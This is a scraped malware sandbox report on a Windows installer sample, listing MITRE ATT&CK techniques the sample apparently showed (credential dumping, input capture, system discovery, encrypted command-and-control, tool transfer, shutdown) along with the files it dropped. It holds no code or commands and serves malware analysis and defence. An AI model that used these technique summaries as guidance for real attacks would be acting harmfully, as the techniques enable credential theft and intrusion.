Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report installer_1.05_36.5.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Sigma Signatures

System Summary

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\a

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Acids

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Checklist

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Comparing

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Cord

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Counts

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Counts.cmd (copy)

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Death

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Draft

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\French

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Fusion

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Guardian

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Happen

Windows Analysis Report
installer_1.05_36.5.exe

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre